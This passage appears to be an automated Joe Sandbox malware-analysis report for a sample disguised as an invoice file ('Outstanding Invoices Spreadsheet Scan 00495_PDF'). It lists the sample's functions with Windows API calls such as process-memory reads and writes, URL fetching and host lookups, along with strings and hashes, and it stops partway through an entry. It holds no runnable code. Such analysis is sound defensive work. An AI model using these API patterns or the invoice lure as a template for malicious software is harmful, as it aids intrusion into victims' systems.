                                                                              • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                              • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                              • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID: '$[$h
                                                                              • API String ID: 2931989736-1224472061
                                                                              • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                              • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                              • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                              • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: >$R$U
                                                                              • API String ID: 909875538-1924298640
                                                                              • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                              • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                              • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                              • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                              • CoUninitialize.OLE32 ref: 0046CE50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                              • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 176396367-557222456
                                                                              • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                              • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopyInit_malloc
                                                                              • String ID: 4RH
                                                                              • API String ID: 2981388473-749298218
                                                                              • Opcode ID: 1f909eb9e3e5aea9af852ba20f23d524d6b7c687d852780188c37355aae39748
                                                                              • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                              • Opcode Fuzzy Hash: 1f909eb9e3e5aea9af852ba20f23d524d6b7c687d852780188c37355aae39748
                                                                              • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • __wcsnicmp.LIBCMT ref: 0046681A
                                                                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                              • String ID: LPT$HH
                                                                              • API String ID: 3035604524-2728063697
                                                                              • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                              • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                              APIs
                                                                                • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                              • String ID: @
                                                                              • API String ID: 4055202900-2766056989
                                                                              • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                              • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset_wcslen
                                                                              • String ID: |
                                                                              • API String ID: 915713708-2343686810
                                                                              • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                              • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                              • HttpQueryInfoW.WININET ref: 0044A892
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3705125965-3916222277
                                                                              • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                              • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                              • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                              • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: AU3_GetPluginDetails
                                                                              • API String ID: 145871493-4132174516
                                                                              • Opcode ID: c57ea1ff5107733e7f7cf5b85816c61dda63c98595592927f1df8c424d4e369b
                                                                              • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                              • Opcode Fuzzy Hash: c57ea1ff5107733e7f7cf5b85816c61dda63c98595592927f1df8c424d4e369b
                                                                              • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 3375834691-2298589950
                                                                              • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                              • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                              • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                              • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                              • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                              • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                              • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                              APIs
                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                              • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                              • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
